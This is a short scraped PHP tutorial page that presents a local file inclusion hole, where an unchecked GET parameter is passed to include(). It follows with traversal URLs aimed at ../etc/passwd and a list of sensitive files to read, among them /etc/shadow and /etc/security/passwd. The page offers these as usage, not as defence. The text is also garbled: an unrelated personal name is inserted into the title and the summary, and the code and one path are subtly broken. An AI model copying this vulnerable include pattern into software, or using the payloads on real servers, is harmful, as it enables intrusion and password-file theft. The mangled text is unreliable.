Home  >  Article  >  Backend Development  >  pimchanok leuwisetpaibul php forges local files containing vulnerable code

pimchanok leuwisetpaibul php forges local files containing vulnerable code

WBOY
WBOYOriginal
2016-07-29 08:47:111301browse

Code:

Copy code The code is as follows:


$page=$_GET['page'];
include($page.'php');
?>


You can use it like this
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../ ../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd
Get more data:
etc/profile
etc/services
/ etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/ usr/lib/security/mkuser.default
from hackteach

The above introduces the code for pimchanok leuwisetpaibul php to forge local files containing vulnerabilities, including the content of pimchanok leuwisetpaibul. I hope it will be helpful to friends who are interested in PHP tutorials.

Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn